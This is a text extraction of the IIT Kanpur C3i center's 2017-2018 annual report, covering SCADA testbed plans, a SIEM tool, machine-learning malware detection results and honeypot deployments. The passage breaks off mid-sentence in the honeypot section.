Transcript
Page 1: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

National Interdisciplinary Center for Cyber Security

and Cyber Defense of Critical Infrastructures

Manindra Agarwal

Sandeep K. Shukla

Subhash Chandra Srivastava

ANNUAL REPORT 2017 – 2018

Submitted to the Science and Engineering Research Board (SERB)

National Interdisciplinary Center for Cyber Security

and Cyber Defense of Critical Infrastructures

Page 2: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 2

Contents History ........................................................................................................................................................... 4

Objectives: .................................................................................................................................................... 6

Deliverables after 5 years: ............................................................................................................................ 7

VULNERABILITY AND PENETRATION TESTING RESULTS OF SCADA TESTBED ............................................... 8

C3I-GUARDIAN: AN INDIGENOUS SECURITY INCIDENT AND EVENT MANAGEMENT (SIEM) SOLUTION

DEVELOPED AT IIT KANPUR ..................................................................................................................... 9

A single solution for Cyber Security and Cyber Defense of Critical Infrastructures. ............................ 9

Milestones Achieved ..................................................................................................................................... 9

INVENTORY INTELLIGENCE SYSTEMS ..................................................................................................... 10

SCADA TEST BED PROGRESS ....................................................................................................................... 13

MALWARE DETECTION, CLASSIFICATION.................................................................................................... 17

Dataset: ............................................................................................................................................... 18

Features collected by only 4 seconds of malware execution: ............................................................ 18

Classification of Zero-day malwares: .................................................................................................. 20

Training and Testing: ........................................................................................................................... 22

Improvement over our Past Results ................................................................................................... 23

AUTOMATIC MALWARE DETECTION USING MEMORY FORENSICS ............................................................ 23

LINUX MALWARE DETECTION BY HYBRID ANALYSIS .................................................................................. 26

DEVELOPMENT OF HONEYPOTS FOR THREAT INTELLIGENCE .................................................................... 28

IOT HONEYPOTS DEPLOYED ........................................................................................................................ 30

CRYPTANALYSIS AND CRYPTO ENGINEERING ............................................................................................. 33

Cryptanalysis of 1-Round KECCAK ....................................................................................................... 33

Resource Efficient Implementation Crypto-primitives in Hardware .................................................. 33

VLSI ARCHITECTURES FOR CRYPTO PRIMITIVES ......................................................................................... 34

PUBLICATIONS - CONFERENCES .................................................................................................................. 37

TECHNICAL REPORTS ................................................................................................................................... 39

HUMAN RESOURCE DEVELOPMENT ........................................................................................................... 40

OUTREACH TO RAISE AWARENESS ABOUT CYBER SECURITY ..................................................................... 41

SUMMER INTERNSHIP PROGRAM .............................................................................................................. 44

Attacks in Android ............................................................................................................................... 44

SEMINARS ................................................................................................................................................... 46

Seminar's by Faculty: .............................................................................................................................. 46

Page 3: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 3

Seminars and Events @ CSE, IITK: ........................................................................................................... 47

MEMORANDUM OF UNDERSTANDING ...................................................................................................... 48

Academic MOUs ...................................................................................................................................... 48

Industry MOUs ........................................................................................................................................ 49

TCG MOU ................................................................................................................................................ 49

Table of Figures:

Figure 1: Our Malware Classification Architecture ....................................................................................... 5

Figure 2: Honeypot with Dockers developed in our Lab ............................................................................... 5

Figure 3: Front End of our SIEM Solution ...................................................................................................... 9

Figure 4: Alert Generation Example ............................................................................................................ 10

Figure 5: Threat/Attack Statistics Console of Guardian to Help Security Engineers to find our attacks on

their system .............................................................................................................................................. 111

Figure 6: Inventory Intelligence Console Displaying Key points of the Cyber Assets Vulnerabilities ....... 122

Figure 7: Patch Information on Console ..................................................................................................... 12

Figure 8: Schematic of the Industrial Scale Cyber Security Test Bed under Procurement ....................... 133

Figure 9: Factory Automation Test Bed under Procurement ................................................................... 144

Figure 10: Malware Classification Architecture ........................................................................................ 177

Figure 11: Architecture of Classification System for Zero-Day Malware .................................................... 21

Figure 12: Process of detecting malware by using memory forensic. ..................................................... 255

Figure 13: The process to detect malware by hybrid analysis .................................................................. 278

Figure 14: A sample of Analytics on the attacks found on IIT Kanpur Network by our Honeypots ........... 31

Figure 15: Distinguishing Script Based Attacks and Manual Attacks based on inter-command Latency ... 34

Figure 16: : Operation of the proposed systolic parallel versatile non-vector GF (2^4) LSB first multiplier

.................................................................................................................................................................. 346

Figure 17: : (a) The circuit with synchronous pipeline, (b) Asynchronous pipeline with glitches due to

delay imbalance in the forward path, (c) Existing asynchronous pipeline without glitches (absence of

delay imbalance in the forward path), (d) Proposed glitch f .................................................................... 378

Figure 18: Block diagram of the AES/RS-BCH co-processor connected with 32-bit Microblaze using Xilinx

Vivado.........................................................................................................................................................39

Page 4: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 4

History

In March 2016, SERB/DST sanctioned the establishment of the

Interdisciplinary center for Cyber Security and Cyber Defense of Critical

Infrastructure (C3i) center. An amount of 14.43 crores INR was

sanctioned over a five year period (March 2016 – Feb 2021), to establish

this center as a center of excellence in securing critical infrastructures of

the country. The idea is to build strong research programme in threat

modeling, threat discovery, mitigation techniques, and also developing

education, awareness of the need for protecting critical infrastructures

such as power grid, transportation systems, manufacturing systems, and

even banking networks from hackers, cyber-army of nation states, and

terrorist organizations.

One of the major objective of the center is to create an industry scale

test-bed that would rival large-scale cyber security test beds present in

the National Labs of the United States such as Sandia National Lab, or

Idaho National Lab. Such a testbed not only provides a research platform

for researchers at IIT Kanpur, but can be used by industry and utilities to

bring their hardware/software for hardware-in-the-loop and software-

in-the-loop testing and security validation. It can also be used to train

utility engineers and executives about cyber attack surfaces, threats, and

mitigation techniques to train them for real life cyber security crises in

their organizations.

The other objectives include building indigenous technology in the cyber

security of critical infrastructure arena, so that a large number of start

ups at IITK can be incubated and products can be launched so reduce

dependence on foreign security products. Dependence on foreign

products pose a supply-chain risk to the nation.

Finally, building manpower both through IITK degree programs, MOOC

courses in cyber security, and also summer internships at C3I center, and

training programs for utilities, and government sector will be part of the

mission of the center.

In this annual report, we briefly go over all the work that has been carried

out since March 2016 till April 2018.

Page 5: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 5

Figure 1: Our Malware Classification Architecture

Figure 2: Honeypot with Dockers developed in our Lab

First let us look at the stated objectives and deliverables of the project to

put the reported work in context.

Page 6: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 6

Objectives: 1. Build a SCADA test bed with power distribution and transmission systems,

manufacturing system for process control and discrete control with a

diversity of SCADA protocols to enable research and education in Cyber

Security of Critical Infrastructure -- in particular power infrastructure, and

Industrial Automation.

2. Build methods, techniques, and technology for making SCADA and

Industrial Control IT system insider attack-proof.

3. Develop Machine learning algorithms for on-going cyber-attack with

advanced persistent threats on power systems.

4. Build methodology and techniques for deploying honey pot and honey

nets to develop a malware repository and malware analysis and trend

forecasting capabilities.

5. Apply formal methods to develop effective algorithms for vulnerability

and malware detection in applications, systems, and firmware -- and

transfer such technology to a startup ecosystem.

6. Develop protocol reverse engineering tools and capabilities to detect

presence of botnets, trojans and other advanced persistent threats in

critical infrastructure.

7. Develop light weight cryptography and block chain-based authentication,

identity management and key management schemes for network of

devices (IoT and M2M).

8. Develop cryptographic co-processors and side-channel proofing

techniques for cryptographic hardware, and software systems.

9. Develop security architecture, perimeter defense, network and Cloud

security for critical infrastructure, and inform the policy formulation and

best practices guidance for NCIIPC.

10. Field testing security techniques, architectures, and protocols on the IITK

smart city project.

Page 7: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 7

Deliverables after 5 years: 1. A national scale SCADA test bed for research, training, and

hardware/software in-the-loop testing by vendors at IIT Kanpur.

2. Tools and techniques for malware collection and bench mark creation for

malware analysis and trending

3. Tools and techniques for application software vulnerability detection

4. Tools and techniques for Insider threat-proofing critical infrastructure IT

system

5. Work with a power utility or smart grid corporation to experimentally use

our PMU data analytics-based tools for detecting advanced persistent

threats

6. Create at least one start up with IIT Kanpur incubation enterprise in the

cyber security of critical infrastructure space by licensing IP in

vulnerability detection, protocol reverse engineering, malware detection

etc.

7. Creation of malware for exploitation of criminal information systems and

mobiles for cyber espionage.

Page 8: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 8

VULNERABILITY AND PENETRATION TESTING RESULTS OF

SCADA TESTBED

Communication protocol vulnerability: Advance man-in-the-middle demonstrated and mitigation techniques tested.

SCADA Application software vulnerability: Privilege escalation, credential dumping in memory have been demonstrated and mitigation techniques tested.

Embedded Web Server Vulnerability: Cross site request forgery demonstrated, and mitigation techniques tested.

Vulnerabilities in the Network devices: Privilege escalation demonstrated, reported to CERT-IN and to NCSC office.

FTP server vulnerability: Hardcoded credentials demonstrated and tested.

The above work demonstrated is on the industrial automation systems deployed in many industrial control systems, water treatment plants (one in Kanpur), and some power distribution systems are vulnerable in multiple ways, and the vendors of SCADA systems, PLCs, Relays and other instrumentation are irresponsible in selling such products in India – leaving our critical infrastructure wide open to attacks.

Page 9: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 9

C3I-GUARDIAN: AN INDIGENOUS SECURITY INCIDENT AND EVENT MANAGEMENT (SIEM) SOLUTION DEVELOPED AT IIT KANPUR

A single solution for Cyber Security and Cyber Defense of Critical Infrastructures.

Many smaller utilities and rural/cooperative banks cannot afford SIEM solutions from vendors such as IBM, Fire eye and other multi-national companies because of the cost, and licensing of the platform technologies. Our solution is built with open source software and can be used freely by such small/medium businesses

Threat Intelligence and Security information and event generation

• Near real time centralized monitoring of both insider and external cyber-attacks on cyber assets of critical infrastructure.

• Design and Development of a centralized security information and event management application.

• Design and deployment of Threat intelligence and SIEM is in process.

Milestones Achieved

Figure 3: Front End of our SIEM Solution

Page 10: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 10

INVENTORY INTELLIGENCE SYSTEMS

Patch management of existing critical cyber assets is extremely important as all software running on an enterprise’s cyber assets often get hit by zero-day exploits and immediate patching is required. Not having a centralized console to know of the latest vulnerabilities, and patch information, the system administrators have to go by Internet news articles to figure out the need for patching. With our system of Inventory intelligence – system admins register all cyber assets with their latest firmware, O/S, and applications with the latest patch versions. The system automatically mines the National Vulnerability Database (NVD) and on the console color codes all assets based on criticality of the patch requirements. As patches get applied, the color code is changed to green. Next step is to put the patch history into block chain, so no insider attack can apply unauthorized patches or replace a software with a malicious one. This is targeted for CISOs, and Security engineers for small/medium utilities and enterprises.

The features of this inventory intelligence system are:

• Centralized inventory management of cyber assets of critical infrastructure.

• Near real time monitoring and notification generation of related vulnerabilities to concerned person to keep the cyber assets patched and updated.

Figure 4: Alert Generation Example

Page 11: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 11

Design and Development of a standalone application with potential user as System Administrator/Security Operations Centre (SOC)

Providing Patch information on the console, and details of the vulnerability

mined from NVD database helps system administrators to educate themselves

before applying a patch.

Figure 5: Threat/Attack Statistics Console of Guardian to Help Security Engineers to find our attacks on their system

Page 12: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 12

Figure 7: Patch Information on Console

Figure 6: Inventory Intelligence Console Displaying Key points of the Cyber Assets Vulnerabilities

Page 13: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 13

SCADA TEST BED PROGRESS Currently the testbed in our center is a power distribution system automation

along with PLC control, Relay management, and SCADA system. However, a new

Cyber Security building is being constructed (slated to be completed on July 31st)

and an industry scale testbed with power generation, transmission and

distribution, industrial automation, water treatment plant, process automation,

and home automation will be established. The procurement process is currently

taking place. This will be completed by mid-2019. The procurement has been

delayed due to the construction of the building. Here is the procurement schedule

is available in Table 1.

Figure 8: Schematic of the Industrial Scale Cyber Security Test Bed under Procurement

Page 14: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 14

Table 1: Procurement Schedule

Description Procurement Phase Proposed

Requisition Date

Binary Ninja Delivered at site

Ida Pro Delivered at site

Maintenance Kit comprising ofScrew Driver Set + Pliers + Hammer + Hack Saw + Utility Knife + Drill bit + Allen key + inch tape + adjustable spanner + emergency torch

Delivered at site

Acrylic Cluster Case For Raspberry Pi

Delivered at site

Crimping Tool With Rj45/11 Lan Tester, Krone Tool And 100 Pcs Connectors

Delivered at site

Network Devices and Server Request for Bidding 26 / 04 / 18

Server

Router

MES

MIS

AM ERP PLM

INTERNET

VPN TUNNEL

SCADA

PLC DB

SERVER

FIREWALL

WEB SERVER

SUPPLY CHAIN

LOGISTICS USER

CLOUD SERVICES INFRASTRUCTURE

PROCESS AUTOMATION TESTBED

DCS DB

SERVER WIFI, WIMAX,

OPERATORS

SCADA

DISCRETE AUTOMATION TESTBED

EXTERNAL FIREWALL INTERNAL FIREWALL ETHERNET SWITCH ROUTER

LEGENDS:

Figure 9: Factory Automation Test Bed under Procurement

Page 15: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 15

Firewall

L3 Ethernet Switch

L2 Ethernet Switch

Access Points

Network Rack

Console Server

Mounting Arrangement Bidding document is ready 26 / 05 / 18

Aluminum composite segment

Panel Accessories and Mounting

arrangement

Printer & Online UPS Bidding document is ready 26 / 05 / 18

Printer

Online UPS

Software Request for Bidding 30 / 04 / 18

SCADA Software along with MIS and MES

Antivirus

Operating System

Power Testbed Bidding document is ready 26 / 05 / 18

Diesel Generator

Transformer

Synchronization system

Process Testbed Bidding document is ready 31 / 05 / 18

Water Tank

Filterbed

Pump

Valve

Field instruments

Discrete Testbed Bidding document is ready 30 / 06 / 18

Feeding Station

Inspection Station

Buffer Station

Processing Station

Page 16: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 16

Sorting Station

PLC Hardware Bidding document is ready 31 / 05 / 18

CPU

Analog module

Digital Module

Backplane with power supply

RTU Hardware Bidding document is ready 30 / 06 / 18

CPU

Analog module

Digital Module

Backplane with power supply

Power Protection Hardware Bidding document is ready 10 / 06 / 18

Transformer Protection device

Distance Protection device

Feeder Protection device

Industrial Wireless Bidding document under

preparation

10 / 08 / 18

VSAT communication

Radio communication

PDC and PMU Hardware Bidding document is ready 10 / 06 / 18

PMU

PDC

DCS Hardware and Software Bidding document under

preparation

15 / 07 / 18

Controller

Software

Solar Power Plant Started: 26 / 10 / 18 Started: 26 / 10 / 18

Page 17: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 17

MALWARE DETECTION, CLASSIFICATION

One of our objectives is to build machine learning based tools for malware

detection and classification to protect systems against malware. Currently we are

dependent mostly on foreign malware detection tools sold by

Symantec, McKafee, Kaspersky, Sophos etc. Recently, the United States has

banned use of Kaspersky tools for all government offices due to concern about

backdoors, and Trojans in such foreign tools which could exfiltrate data. So, our

goal has been to build tools to classify malware so that we have indigenous

product soon. In the past one and half years, we have extensively worked on this

problem, and here we give a snapshot of one latest work which allowed us to use

dynamic behavior profiling, feature extraction and classification of malware into

distinct classes, and to classify previously unseen malware using zero-shot

learning.

Figure 10: Malware Classification Architecture

Page 18: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 18

Dataset:

Our dataset comprises of around 29550 Win32 malwarefrom 8 malware types

and 15 malware families. Table 2 provides the details of the dataset used for

learning.

Table 2: The Dataset for our Malware Analysis

MalwareType MalwareFamily NumberofSamples TrojanDropper Sventore.C 1,577

Sventore.A 1,347

TrojanDownloader Renos 1,985 Small 1,316

Tugspay 3,417

Worm

Yuner 3,794 Allaple 4,258

VB 2,418

Trojan Startpage 1,565

Comame!gmb 1,830

Virus Luder 1,967 Virtool VBInject 1202

PWS OnlineGames 1041

Backdoor Agent 1,020 RBot 817

Total 29,554

Features collected by only 4 seconds of malware execution:

Set of 433 signatures (specific to windows and networks), extracted 25 frequent

signatures(binary feature), for example:

Whether it allocates read-write-execute memory (usually to unpack itself)

Whether it installs itself for autorun at Windows startup

Whether it steals private information from local Internet browsers

Whether it queries the disk size, checks amount of memory in system, checks

adapter addresses etc.

API bins - divided API calls into 16 categories instead of ngram technique which is

very common in the past literature

Page 19: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 19

Netapi, certificate, notification, network, services, exception, crypto, ole,

resource, UI, synchronization, misc, process, file, system, registry

31 network features (IP Entropy, HTTP Information, Protocol Information, Dead

Hosts, Domains, Ratio of Public and Private IP addresses)

No of processes created (child and new) and No of dropped files(No of files

downloaded by sample or created at the beginning while unpacking)

We have used classifiers such as Simple Neural network, XGBoost and KNN to

evaluate our technique. Below table shows the results for applying these

classifiers on the testing set (comprises of 20% of dataset) on all the features

discussed in previous section. Evaluation metrics used are True Positive Rate,

False Positive Rate, Precision and FScore.

We achieved a comparable accuracy of 98.02% with just 4 seconds of the

behavioral data. There is always a tradeoff between achieving good accuracy and

performing classification in short time. Our work has taken care of both the above

things.

Table 3: Results of Various Classification Methods Applied to Malware Data Set

Class

XG-Boost KNN SimpleNeuralNet TPR FPR Pr FM TPR FPR Pr FM TPR FPR Pr FM

Backdoor

PWSTroja

nTrojDow

nTrojDro

pVirtoolV

irusWor

ms

0.96

0.955

0.923

0.986

0.996

0.992

0.977

0.993

0.003

0.0005

0.0006

0.008

0.0001

0.001

0.0047

0.0041

0.90

0.98

0.99

0.97

0.99

0.96

0.93

0.99

0.929

0.964

0.953

0.974

0.99

0.974

0.949

0.99

0.955

0.91

0.921

0.905

0.985

0.836

0.770

0.992

0.007

0.002

0.004

0.015

0.0009

0.003

0.011

0.036

0.823

0.919

0.965

0.949

0.991

0.924

0.832

0.937

0.884

0.914

0.942

0.926

0.987

0.877

0.799

0.963

0.955

0.945

0.905

0.968

0.992

0.944

0.910

0.992

0.006

0.001

0.001

0.014

0.0009

0.002

0.004

0.009

0.834

0.964

0.99

0.953

0.991

0.947

0.934

0.982

0.89

0.954

0.945

0.960

0.991

0.945

0.921

0.986

Page 20: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 20

Classification of Zero-day malwares:

Using the above models, we can classifythe malware accurately 98% of times

But what happens if the malware authors develop completely new malware

family by exploiting some zero-day vulnerability? For such malware classification,

we need to be able to classify malwares which have not been seen in the wild (in

this case our dataset) into its type with only 4 seconds of behavioral information.

Table 4: Dataset used for Zero-Day Malware Classification

Types Training Testing

WormsVirusTrojan 7587 3794 TrojanDropper 5417 645 TrojanDownloader 4288 1565 Backdoor 3326 1347 Total 31766 10356

Table 5: the dataset after SMOTE which performed best among these techniques

Types Training Testing

Worms Allaple,VB,Vobfus, Mydoom Yuner Virus luder,Expiro,Virut,Ramnit,Parite,Mabezat,Patchload Krepper Trojan Bulta!rfn,Comame!gmb,BHO,Koutodoor,Alureon

Vundo,Agent,Toga!rfn,VB,Bagsu!rfn,Rimecud Startpage

TrojanDropper Agent,Lamechi,Small,Sirefef Sventore.A TrojanDownloader Small,Tugspay,Agent,Banload,Delf,Adload,Wintrim Renos Backdoor Rbot,Zegost,Hupigon,IRCbot,Delf

Cycbot,Sdbot,VB,Bifrose Agent

Page 21: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 21

Figure 11: Architecture of Classification System for Zero-Day Malware

We observed that our dataset is highly imbalanced i.e. one family in a type with

more samples dominating other families which have less samples. Thus, we

applied various resampling techniques such as SMOTE, SMOTENN, SMOTETomek

etc. which are basically oversampling techniques.

Table 6: Training Set Sample Sizes for Different classes

Types Samples in Training Set

Worms, Virus, Tojan 7587

TrojanDropper 13776 TrojanDownloader 20627 Backdoor 3326 Total 64362

Page 22: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 22

Training and Testing:

For classifying unknown samples, a different approach was adopted since the

basic classifiers did not perform well on the dataset. 6 binary classifiers were

created one for each type and trained using One vs All approach, i.e. if a classifier

of type Trojan is being trained, then one class will contain all the trojans and the

other class will contain samples from rest of the types. Since feature set consists

of 4 categories namely network, process, bins and signatures, various

combinations of these categories were tried to find the best feature set for a

binary classifier.

Also, several experiments were performed where top n features (which are

ranked based on their importance, measured using Fscore) were selected as

feature set for the classifiers. Here n varies from 5 to 50. Finally, that feature set

is selected for each classifier which gave minimum misclassification error on the

validation set. Then for any test sample, the probability of it belonging to each

type is calculated using these classifiers and then it is assigned to the type with

maximum probability.

Table 7: The Accuracy and False Positive Rate Scores of Our Classifier

Types Accuracy FPR

Worms 78.30% 0.008

Virus 73.79%

0.065

Trojan 61.85% 0.166

TrojanDropper 91.98%

0.02

TrojanDownloader 34.55% 0.101 Backdoor 69.31% 0.013

From Table 7, we can see the accuracy of each type, Trojandownloader performed

relatively poor than other types but since our classifier is classifying it in its parent

family (Trojan), our classifier seems effective.

Page 23: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 23

Improvement over our Past Results

In our most recent work on malware detection, we did not have classification

performed during detection. In this previous work we used hybrid approach,

containing features from both static and dynamic data.Static features included

COFF file and Optional header attributes, histograms related to string length and

entropy-based feature for packed malwares. Dynamic features include file

system, mutex and registry related features. Also, our past dataset was smaller

in size (~12587 malwares and 1800 benignwares) which could be improved upon

by the recent work as we have collected much larger set of malware in the recent

past. Even though we achieved the detection accuracy of 98.62 %, we did not do

any classification of types and families of malware.

In another related work in the recent past, classification of malware into malware

classes was attempted by us. In that work, we converted the malicious executable

to image files and used ResNEt and CNN to perform classification. We achieved

an accuracy of 98.22%. This work used a larger dataset of 44935 samples

comprising of both Win32 and Win64 executables. However, in the most recent

work reported here, classification into a larger number of malware classes has

been achieved. We are now able to classify into types Virtool and PassWord

Stealer(PWS) which was not included in the previous dataset. Also, no attempt

was made on zero-day malware classification.

Currently, we are in the process of combining all these different classification and

detectionmodels into a single framework – which will consist of a set of tools for

detection and classification, and any malware found can then be submitted to all

the tools simultaneously and the results will be combined to give better accuracy.

AUTOMATIC MALWARE DETECTION USING MEMORY FORENSICS

Detection of a malware when a new binary is downloaded, to distinguish it from

‘benign-ware’ is an important part of computer security. There exist various

techniques proposed by researchers using both static and dynamic analyses to

detect malware. But day by day, malware authors have improved its evasion

Page 24: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 24

capability using non-persistence and volatile payloads that operate only in

memory. Also malware authors are using obfuscation techniques to make the

reverse engineering process of binary tougher and hence now, malware analysis

is not only limited to static and dynamic analysis, researchers are investigating

other approaches also to bifurcate malware and benign more effectively.

Memory forensics techniques is a comprehensive view of the actions of the

malicious executables. Hence in this work, we analyze binaries of WINDOWS 32-

bit OS using memory forensic on generated memory dumps to detect malware

effectively as shown in Figure 12: Process of detecting malware by using memory

forensic.Figure 12. To understand the typical behavior of malware, we have used

interval-based approach to take the memory dumps.

These memory dumps are generated by the cuckoo sandbox and then the

features are extracted from each of them such as registry bindings, suspicious

DLLs, hidden processes, orphan threads, code injection, injected DLLs, file system

etc. For the detection of malware,we selected the features for the classifier

models by info gain index. The obtained features are used to investigate the XG-

Boost, KNN and Decision Tree classifier using k-fold cross-validation to avoid

over-fitting. We found that XG-Boost classifier outperformed among other

classifiers with 99.09% accuracy to detect malware.

We compared our work with others researchers(R. Mosli et. el.,

ChathurangaRathnayaka et. al. and M. Aghaeikheirabady et al.) works and found

that, our approach outperformed as illustrated in Table 8: Comparison of our

work with other researchers work.

Table 8: Comparison of our work with other researchers work.

Authors Accuracy No of samples Used Features Used

R. Mosli et. al. 96% 400 malware 100 Benign

Registry Keys,

DLLs,API Mr. ChathurangaRathnayaka et. al.

90% 200 Malware 200 Benign

Kernel memory, kernel objects, registry, Api,strings, File Systems

Page 25: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 25

M. Aghaeikheirabady et. al.

98% 350 Malware 200 Benign

Registry changes, function calls etc.

Ours approach 99.09% 1730 Malware 1571 Benign

259 features {registry, suspicious DLLs, process dump, kernel dump , code injection, File System etc.}

Figure 12: Process of detecting malware by using memory forensic.

In future we will be working to reduce the false positive rate to zero for the

detection of malware. And this workuses memory dump of system, after every

10 sec intervalsand deposited a huge amount of data hence,in future we will

reduce these number of memory dump needed to parse for a sample. The

memory dump can be taken only when any malicious activity is recorded in guest

machine such asabsurd increase in CPU usage, unknown access to

registry,increasein traffic on the network, etc. Based on this information we can

reduce the size of our parsed memory dump. The work can be extended to build

a tool for Windows operating system for continuously monitoring the system and

whenever something is malicious activity in memory it will inform the user which

process may harm your personal computers.

Page 26: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 26

LINUX MALWARE DETECTION BY HYBRID ANALYSIS

Over the past two decades, cyber-security research community has been working

on detecting malicious programs for the Windows-based operating system.

However, the recent exponential growth in popularity of IoT (Internet of Things)

devices is causing the malware landscape to change rapidly. This so-called 'IoT

Revolution' has fueled the interests of malware authors which has led to an

exponential growth in Linux malware. The increasing number of malware is

becoming a serious threat to data privacy as well as to the expensive computer

resources. Manual malware analysis is not effective due to the large number of

such cases. Furthermore, the malware authors are using various obfuscation

techniques to impede the detection of traditional signature-based anti-virus

system. As a result, automated yet robust malware analysis is much needed

As we see in the earlier sections that both static and dynamic have some

limitation. Static analysis can be thwarted once some encryption algorithm is

used while Dynamic analysis is suffering from low code coverage problem. But

what if we combine the feature set of both approaches. The dynamic can be

handy to get full insights when static analysis gets thwarted by obfuscation, on

the other hand, static analysis can cover the full overview of the executable when

dynamic suffers the code coverage issue. This shows that both can act a

complementary to each other. Malware authors use packers, obfuscation

techniques, Polymorphism/Metamorphism techniques to bypass file format

based analysis or signature-based analysis. They can make the malware to do

some random stuff like a randomly accessing file, call a random system call, etc.

to bypass dynamic analysis. But bypassing both the technique at once will be a

tougher job for them. In this work, wedevelop a hybrid approach by integrating

both static features as well as dynamic features of a malware, to detect it

efficiently as shown in Figure 13. We performed static and dynamic analysis on

7717 malware and 2265 benign files and extracted static features and dynamic

feature of executables separately. Then these obtained features are integrated

to construct machine learning model using KNN, Decision Tree and Random

Forest classifiers separately. Among the selected models we found that the

Page 27: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 27

Random Forest outperformed others with highly promising detection accuracy of

99.14%.

Table 9: Comparison of our work with other researchers work.

Authors Features Accuracy Dataset Type of feature

Shahzad et. al. 383 99% 709 Benign 709 Malware

Static: ELF structure

Jinrong et. al. 100 98% 756 Benign 763 Malware

Static: Symbol Table

Shahzad et. al.(another work)

16 96% 105 Benign 114 Malware

Dynamic: Process control block

Ours 115 + 260 99.14% 2265 Benign 7717 Malware

Static: ELF Header +Strings Dynamic: System calls + File Systems + Shell Command

Table 9. shows the comparison of accuracy attained by other works, which were

performed on a very small dataset. In this work, we have used a large corpus of

Figure 13: The process to detect malware by hybrid analysis

Page 28: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 28

both malware and benign files to make our model robust. Shahzad et. al. has

performed analysis using fields of ELF static structure with a 99% detection

accuracy but since this approach is static based they have rejected some of the

samples which have forged headers. Ashmita et. al. has used the dynamic

approach in which they have analyzed system calls. They got a great detection

accuracy of 99.40 %, but the dataset they used had only 226 malware, and the

number of features was also very less. Our model has got a comparable average

detection accuracy of 99.14%, and the strength of our dataset is also pretty

good compared to other works (Table. 3), which makes our model robust.

All prior work on Linux malware analysis used less than 1000 malware, and hence

the accuracy numbers reported by them are not completely validated. Our work

improves over prior work in two ways: substantial enhancement in the dataset,

and hybrid analysis based on both static and dynamic features.

This work focuses on ELF file format, but there exists other malware with

different types, like Perl script,Python script, Shell script, Bash script,PHP script

etc. to perform malicious activity.In future we will add different modules in our

model to generate more comprehensive anti-malware systems.

DEVELOPMENT OF HONEYPOTS FOR THREAT INTELLIGENCE

• We deployed honeypots related to services such as SSH, FTP, SMB, Telnet,

SQLi, Web, CWMP

• Honeypots were deployed at different geographical locations such as San

Francisco,London, Toronto , India , France and New York for more than a

month. All the honeypots collectively received a total of 57075 attacks.

• HoneySMB was deployed for around 25 days received a total of 1147 attack

from 867 unique IPs. HoneySMB has downloaded 21 different malicious

